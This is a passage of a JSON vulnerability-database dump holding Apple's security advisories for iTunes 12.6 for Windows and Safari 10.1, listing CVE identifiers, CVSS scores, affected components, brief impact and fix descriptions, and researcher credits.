This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-12-11T11:38:44", "title": "About the security content of iTunes 12.6 for Windows - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2479", "CVE-2012-1148", "CVE-2012-1147", "CVE-2015-3415", "CVE-2017-2480", "CVE-2015-3717", "CVE-2016-5300", "CVE-2015-1283", "CVE-2012-6702", "CVE-2016-0718", "CVE-2016-6153", "CVE-2015-3416", "CVE-2017-5029", "CVE-2015-3414", "CVE-2009-3720", "CVE-2015-6607", "CVE-2009-3270", "CVE-2009-3560", "CVE-2017-2463", "CVE-2016-4472", "CVE-2017-2493", "CVE-2013-7443", "CVE-2017-2383"], "modified": "2017-12-11T11:38:44", "id": "APPLE:HT207599", "href": "https://support.apple.com/kb/HT207599", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-11-10T17:00:51", "description": "# About the security content of 
iTunes 12.6 for Windows\n\nThis document describes the security content of iTunes 12.6 for Windows.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iTunes 12.6 for Windows\n\nReleased March 21, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position can track a user's activity\n\nDescription: A client certificate was sent in plaintext. This issue was addressed through improved certificate handling.\n\nCVE-2017-2383: Matthias Wachs and Quirin Scheitle of Technical University Munich (TUM)\n\nEntry added March 28, 2017\n\n**iTunes**\n\nAvailable for: Windows 7 and later\n\nImpact: Multiple issues in SQLite\n\nDescription: Multiple issues existed in SQLite. These issues were addressed by updating SQLite to version 3.15.2.\n\nCVE-2013-7443\n\nCVE-2015-3414\n\nCVE-2015-3415\n\nCVE-2015-3416\n\nCVE-2015-3717\n\nCVE-2015-6607\n\nCVE-2016-6153\n\n**iTunes**\n\nAvailable for: Windows 7 and later\n\nImpact: Multiple issues in expat\n\nDescription: Multiple issues existed in expat. 
These issues were addressed by updating expat to version 2.2.0.\n\nCVE-2009-3270\n\nCVE-2009-3560\n\nCVE-2009-3720\n\nCVE-2012-1147\n\nCVE-2012-1148\n\nCVE-2012-6702\n\nCVE-2015-1283\n\nCVE-2016-0718\n\nCVE-2016-4472\n\nCVE-2016-5300\n\n**libxslt**\n\nAvailable for: Windows 7 and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: December 11, 2017\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-21T00:00:00", "type": "apple", "title": "About the security content of iTunes 12.6 for Windows", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3270", "CVE-2009-3560", "CVE-2009-3720", "CVE-2012-1147", "CVE-2012-1148", "CVE-2012-6702", "CVE-2013-7443", "CVE-2015-1283", "CVE-2015-3414", "CVE-2015-3415", "CVE-2015-3416", "CVE-2015-3717", "CVE-2015-6607", "CVE-2016-0718", "CVE-2016-4472", "CVE-2016-5300", "CVE-2016-6153", "CVE-2017-2383", "CVE-2017-2463", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2493", "CVE-2017-5029"], "modified": "2017-03-21T00:00:00", "id": "APPLE:198F1AB81F91F2CEB090B4B4D49C57AD", "href": "https://support.apple.com/kb/HT207599", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-24T20:42:37", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has 
occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## Safari 10.1\n\nReleased March 27, 2017\n\n**CoreGraphics**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**JavaScriptCore**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed by disabling text input until the destination page loads.\n\nCVE-2017-2376: an anonymous researcher, Chris Hlady of Google Inc, Yuyang Zhou of 
Tencent Security Platform Department (security.tencent.com), Muneaki Nishimura (nishimunea) of Recruit Technologies Co., Ltd., Michal Zalewski of Google Inc, an anonymous researcher\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may present authentication sheets over arbitrary web sites\n\nDescription: A spoofing and denial-of-service issue existed in the handling of HTTP authentication. This issue was addressed through making HTTP authentication sheets non-modal.\n\nCVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website by clicking a link may lead to user interface spoofing\n\nDescription: A spoofing issue existed in the handling of FaceTime prompts. This issue was addressed through improved input validation.\n\nCVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Safari Login AutoFill**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: A local user may be able to access locked keychain items\n\nDescription: A keychain handling issue was addressed through improved keychain item management.\n\nCVE-2017-2385: Simon Woodside of MedStack\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Dragging and dropping a maliciously crafted link may lead to bookmark spoofing or arbitrary code execution\n\nDescription: A validation issue existed in bookmark creation. 
This issue was addressed through improved input validation.\n\nCVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative \n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Jeonghoon Shin, Natalie Silvanovich of Google Project Zero\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite 
v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy\n\nDescription: An access issue existed in Content Security Policy. This issue was addressed through improved access restrictions.\n\nCVE-2017-2419: Nicolai Gr\u00f8dum of Cisco Systems\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An information disclosure issue existed in the processing of OpenGL shaders. 
This issue was addressed through improved memory management.\n\nCVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore Programming Group, Imperial College London\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2433: Apple\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2364: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. 
This issue was addressed with improved state management.\n\nCVE-2017-2446: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. 
This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-2486: an anonymous researcher\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2392: Max Bazaliy of Lookout\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2457: lokihardt of Google Project Zero\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7071: Kai Kang (4B5F5F4B) of Tencent's Xuanwu 
Lab (tencent.com) working with Trend Micro's Zero Day Initiative \n\nEntry added August 23, 2017\n\n**WebKit JavaScript Bindings**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2442: lokihardt of Google Project Zero\n\n**WebKit Web Inspector**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Closing a window while paused in the debugger may lead to unexpected application termination\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2377: Vicki Pfau\n\n**WebKit Web Inspector**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2405: Apple\n\n\n\n## Additional recognition\n\n**Safari**\n\nWe would like to acknowledge Flyin9 (ZhenHui Lee) for their assistance.\n\n**Webkit**\n\nWe would like to acknowledge Yosuke HASEGAWA of Secure Sky Technology Inc. 
for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-29T02:51:42", "title": "About the security content of Safari 10.1 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9643", "CVE-2017-2486", "CVE-2017-2389", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2442", "CVE-2017-2492", "CVE-2017-2395", "CVE-2017-2444", "CVE-2017-2447", "CVE-2017-2433", "CVE-2017-2459", "CVE-2017-2454", "CVE-2017-7071", "CVE-2017-2471", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", "CVE-2017-2396", "CVE-2017-2465", "CVE-2017-2446", "CVE-2017-2405", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2378", "CVE-2017-2376", "CVE-2017-2419", "CVE-2017-2491", "CVE-2017-2377", "CVE-2017-2466", "CVE-2017-2364", "CVE-2017-2481", "CVE-2017-2392", "CVE-2017-2453", "CVE-2016-9642", "CVE-2017-2415", "CVE-2017-2424", "CVE-2017-2394", "CVE-2017-2457", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2445", "CVE-2017-2476", "CVE-2017-2385"], "modified": "2017-08-29T02:51:42", "id": "APPLE:HT207600", "href": 
"https://support.apple.com/kb/HT207600", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-10T11:42:41", "description": "# About the security content of Safari 10.1\n\nThis document describes the security content of Safari 10.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## Safari 10.1\n\nReleased March 27, 2017\n\n**CoreGraphics**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**JavaScriptCore**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google 
Project Zero\n\nEntry updated April 24, 2017\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed by disabling text input until the destination page loads.\n\nCVE-2017-2376: an anonymous researcher, Chris Hlady of Google Inc, Yuyang Zhou of Tencent Security Platform Department (security.tencent.com), Muneaki Nishimura (nishimunea) of Recruit Technologies Co., Ltd., Michal Zalewski of Google Inc, an anonymous researcher\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may present authentication sheets over arbitrary web sites\n\nDescription: A spoofing and denial-of-service issue existed in the handling of HTTP authentication. This issue was addressed through making HTTP authentication sheets non-modal.\n\nCVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website by clicking a link may lead to user interface spoofing\n\nDescription: A spoofing issue existed in the handling of FaceTime prompts. 
This issue was addressed through improved input validation.\n\nCVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Safari Login AutoFill**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: A local user may be able to access locked keychain items\n\nDescription: A keychain handling issue was addressed through improved keychain item management.\n\nCVE-2017-2385: Simon Woodside of MedStack\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Dragging and dropping a maliciously crafted link may lead to bookmark spoofing or arbitrary code execution\n\nDescription: A validation issue existed in bookmark creation. This issue was addressed through improved input validation.\n\nCVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with 
Trend Micro's Zero Day Initiative \n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Jeonghoon Shin, natashenka of Google Project Zero\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy\n\nDescription: An access issue existed in Content Security Policy. 
This issue was addressed through improved access restrictions.\n\nCVE-2017-2419: Nicolai Gr\u00f8dum of Cisco Systems\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An information disclosure issue existed in the processing of OpenGL shaders. This issue was addressed through improved memory management.\n\nCVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore Programming Group, Imperial College London\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2433: Apple\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2364: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling 